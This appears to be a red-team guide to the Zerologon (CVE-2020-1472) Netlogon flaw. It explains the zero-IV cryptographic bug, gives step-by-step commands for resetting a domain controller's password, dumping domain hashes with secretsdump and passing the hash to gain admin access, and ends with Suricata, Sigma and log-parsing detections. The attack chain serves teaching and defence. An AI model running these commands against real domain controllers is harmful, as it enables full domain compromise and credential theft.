Exploiting Zerologon Vulnerability (CVE-2020-1472)

Overview

Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw lies in how the protocol uses AES-CFB8: the initialization vector (IV) is fixed to all zeros instead of being random. This lets an unauthenticated attacker with network access to a domain controller establish a Netlogon session and reset the DC machine account password to an empty string, which leads to full domain compromise. Microsoft patched the vulnerability in August 2020 (KB4571694).

Prerequisites

  • Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
  • No authentication required (unauthenticated exploit)
  • Target DC must not have the February 2021 enforcement mode enabled
  • Impacket toolkit installed
  • Written authorization for red team engagement

MITRE ATT&CK Mapping

Technique ID   Name                                      Tactic
------------   ----------------------------------------  --------------------
T1068          Exploitation for Privilege Escalation     Privilege Escalation
T1210          Exploitation of Remote Services           Lateral Movement
T1003.006      OS Credential Dumping: DCSync             Credential Access
T1078.002      Valid Accounts: Domain Accounts           Persistence

Vulnerability Technical Details

Root Cause

The Netlogon authentication protocol uses AES-CFB8 to encrypt the client and server challenges. The vulnerability exists because:

  1. The IV is hardcoded to 16 bytes of zeros instead of being random
  2. When the plaintext is 8 bytes of zeros, AES-CFB8 with a zero IV produces a ciphertext of all zeros with probability 1 in 256 (exactly when the first byte of the AES encryption of the zero block is zero, so the feedback register never changes)
  3. Each attempt uses a fresh session key, so an attacker needs approximately 256 authentication attempts (~3 seconds) before one succeeds
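To see why a fixed zero IV is fatal in CFB8, here is an added example (not part of this skill) that implements generic CFB8 over a stand-in keyed block function (SHA-256 based, assumed in place of AES so it runs without third-party libraries) and measures how often an all-zero 8-byte challenge encrypts to all zeros with the zero IV versus a random IV. The keys are constructed sample values, not real session keys.

```python
import hashlib
import os

# Stand-in keyed 128-bit block function (SHA-256 of key||block, truncated).
# It is NOT AES; any unpredictable keyed block function shows the same CFB8
# feedback behaviour, and this one needs no third-party library.
def block_fn(key: bytes, block: bytes) -> bytes:
    return hashlib.sha256(key + block).digest()[:16]

def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: each plaintext byte is XORed with byte 0 of E(register),
    then the resulting ciphertext byte is shifted into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = block_fn(key, bytes(register))[0] ^ p
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)

ZERO_IV = bytes(16)        # the hardcoded IV behind CVE-2020-1472
ZERO_CHALLENGE = bytes(8)  # an all-zero 8-byte client challenge

def derive_key(i: int) -> bytes:
    """Deterministic sample session key number i (constructed, not a real key)."""
    return hashlib.sha256(i.to_bytes(4, "big")).digest()[:16]

def first_byte_is_zero(key: bytes) -> bool:
    return block_fn(key, ZERO_IV)[0] == 0

def zero_iv_gives_zero_ciphertext(key: bytes) -> bool:
    """With IV = 0 and plaintext = 0 the ciphertext is all zeros exactly when
    E(key, 0^16)[0] == 0: a zero byte is shifted in, the register stays zero,
    and every later byte repeats the same zero. Expected for 1 key in 256."""
    return cfb8_encrypt(key, ZERO_IV, ZERO_CHALLENGE) == bytes(8)

def zero_rate(trials: int, random_iv: bool = False) -> float:
    """Fraction of sample keys whose encryption of zeros is all zeros:
    about 1/256 with the zero IV, about 0 (2^-64) with a random IV."""
    hits = 0
    for i in range(trials):
        iv = os.urandom(16) if random_iv else ZERO_IV
        if cfb8_encrypt(derive_key(i), iv, ZERO_CHALLENGE) == bytes(8):
            hits += 1
    return hits / trials
```

The random-IV run shows the fix: with a per-session random IV, an all-zero challenge no longer has a usable chance of encrypting to all zeros.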

Affected Systems

  • Windows Server 2008 R2 through Windows Server 2019
  • All domain controllers running unpatched Netlogon service
  • Samba versions < 4.8 (if running as AD DC)

Step 1: Identify Vulnerable Domain Controllers

# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24

# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1

# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon

Step 2: Exploit Zerologon

# Using Impacket's CVE-2020-1472 exploit
# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1

# Expected output:
# Performing authentication attempts...
# =========================================
# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)
# NetrServerPasswordSet2 call was successful
# DC01$ machine account password set to empty string

Step 3: DCSync with Empty Password

# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1

# Output includes all domain hashes:
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::

# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
  -just-dc-user Administrator

Step 4: Obtain Domain Admin Access

# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
  corp.local/Administrator@10.10.10.1

Step 5: Restore Machine Account Password (CRITICAL)

WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.

# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
  -hexpass <original_hex_password>

# Method 2: Force machine account password change from DC
# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*

# Method 3: Restart the DC (it will auto-regenerate machine password)
# This is the safest method but causes downtime

Detection

Windows Event Logs

Event ID 4742: A computer account was changed
- Look for: the DC$ account with its password (Password Last Set) changed
- Anomaly: multiple 4742 events for DC$ in a short period, or one outside the normal machine-password rotation

Event ID 5805: Netlogon authentication failure (System log, source NETLOGON)
- A burst of failures from one source followed by a success is consistent with a Zerologon attempt

Event ID 4624 (Type 3): Network logon
- DC$ account logging in from an unexpected IP

Network Detection

# Suricata rule for Zerologon: pin the match to the Netlogon interface
# (UUID 12345678-1234-abcd-ef00-01234567cffb), where NetrServerReqChallenge is
# opnum 4, and look for the all-zero 8-byte client challenge
alert dcerpc any any -> any any ( \
  msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge"; \
  flow:established,to_server; \
  dce_iface:12345678-1234-abcd-ef00-01234567cffb; \
  dce_opnum:4; \
  content:"|00 00 00 00 00 00 00 00|"; \
  reference:cve,2020-1472; \
  sid:2030870; \
  rev:1; \
)

Sigma Rule

title: Zerologon Exploitation Attempt
status: stable
description: Burst of Netlogon authentication failures (System log, NETLOGON event 5805) on a domain controller, consistent with the ~256 attempts Zerologon needs
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: NETLOGON
        EventID: 5805
    timeframe: 5m
    condition: selection | count() by Computer > 100
level: critical
tags:
    - attack.privilege_escalation
    - attack.t1068
    - cve.2020.1472
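As an added example (not part of this skill), the following Python implements the two detections above, the 5805 burst count behind the Sigma rule and the DC$ 4742 change review, over constructed sample events in a simplified pipe-delimited form; the event format and field layout are assumptions, not real Windows log output.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs) as "timestamp|EventID|Computer|detail":
# 150 NETLOGON 5805 failures on DC01 within three seconds, then the DC01$ password
# change, then ordinary daily noise later the same day.
SAMPLE_EVENTS = (
    [f"2020-09-14T10:00:{i % 3:02d}|5805|DC01|session setup from WIN-ATTACK failed"
     for i in range(150)]
    + ["2020-09-14T10:00:05|4742|DC01|target=DC01$ attr=PasswordLastSet",
       "2020-09-14T15:12:03|5805|DC01|session setup from LAPTOP42 failed",
       "2020-09-14T15:12:09|4742|DC01|target=LAPTOP42$ attr=PasswordLastSet"]
)

def parse_event(line: str):
    ts, event_id, computer, detail = line.split("|", 3)
    return datetime.fromisoformat(ts), int(event_id), computer, detail

def netlogon_failure_bursts(lines, threshold=100, window=timedelta(minutes=5)):
    """Sliding-window form of the Sigma rule: per DC, alert once more than
    `threshold` 5805 events fall inside any `window`.
    Returns (computer, window_start, window_end, count) tuples."""
    per_dc = defaultdict(list)
    for line in lines:
        ts, event_id, computer, _ = parse_event(line)
        if event_id == 5805:
            per_dc[computer].append(ts)
    alerts = []
    for computer, times in per_dc.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop events older than the window
                start += 1
            if end - start + 1 > threshold:
                alerts.append((computer, times[start], t, end - start + 1))
                break                           # one alert per DC is enough
    return alerts

def dc_account_changes(lines, dc_names):
    """4742 events whose target is a DC machine account. These are expected only
    on the normal machine-password rotation, so each one deserves a look."""
    hits = []
    for line in lines:
        ts, event_id, _, detail = parse_event(line)
        if event_id == 4742:
            target = detail.split("target=", 1)[1].split()[0]
            if target.endswith("$") and target[:-1] in dc_names:
                hits.append((ts.isoformat(), target))
    return hits
```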

Defensive Recommendations

  1. Apply patches immediately - KB4571694 (August 2020) and enforce February 2021 mode
  2. Enable enforcement mode via registry: FullSecureChannelProtection = 1
  3. Monitor Event ID 5805 for repeated Netlogon failures
  4. Deploy Microsoft Defender for Identity (detects Zerologon automatically)
  5. Network segmentation - Restrict direct access to DCs from user networks
  6. Block Netlogon RPC from non-DC systems where possible
